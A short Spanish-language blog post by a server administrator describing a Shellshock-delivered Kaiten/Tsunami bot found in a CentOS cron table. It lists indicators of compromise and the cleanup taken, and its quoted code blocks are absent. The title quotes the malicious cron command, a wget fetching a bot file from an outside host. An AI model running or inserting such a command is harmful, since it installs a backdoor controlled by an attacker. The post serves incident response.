LINUX: wget stablehost.us/bots/regular.bot etc en nuestro cron es un troyano

Aviso: Esto no es una solución, son datos que te pueden ayudar a solucionarlo.

Hoy, me he encontrado con que en el cron de mi CentOs me faltaban tareas, y que además había una muy sospechosa:

Investigando en las siguientes webs encontré que se trataba de un troyano/malware que ha aprovechado la reciente vulnerabilidad shellshock llamado Linux.Backdoor.Kaiten o Tsunami Bot

Enlaces/fuentes que me han ayudado:

– http://infosecnirvana.com/shellshock-hello-honeypot/ (Datos sobre el malware)

– http://rm-rf.in/post/98621485262/shellshock-test-the-vulnerability (Para arreglar la vulnerabilidad)

– http://security.stackexchange.com/questions/16908/is-secureshellz-bot-a-virus-how-does-it-work

 

En mi servidor CentOs pude recoger algunos datos:

1. Linea de cron especificada anteriormente
2. Archivo /tmp/.pwn
3. Proceso .c en el top
4. Log en apache

Lo más interesante es el archivo /tmp/.pwn cuyo contenido es el siguiente:

Aquí vemos como se conecta a una serie de servidores de los que descarga el malware en cuestión del que pondré un fragmento abajo de este post. A continuación lo compila con gcc y asigna permisos a directorios en /tmp, lo extraño es que después elimina los archivos descargados.

Después en el log de apache /etc/httpd/logs/access_log encontré como se ejecuto el comando inicial así como la IP atacante:

Ahora bien, ¿qué es lo que he hecho?

He actualizado el bash para que no vuelva a pasar

He eliminado:

– La tarea de cron

– El archivo /tmp/.pwd

Y por último he decidido actualizar los servidores.

Este post no está completo, si consigo más información lo terminaré.

Os dejo el fragmento de código del malware donde se ve que entre otras cosas abre un canal IRC:

Está recortado, en total tiene unas 985 líneas.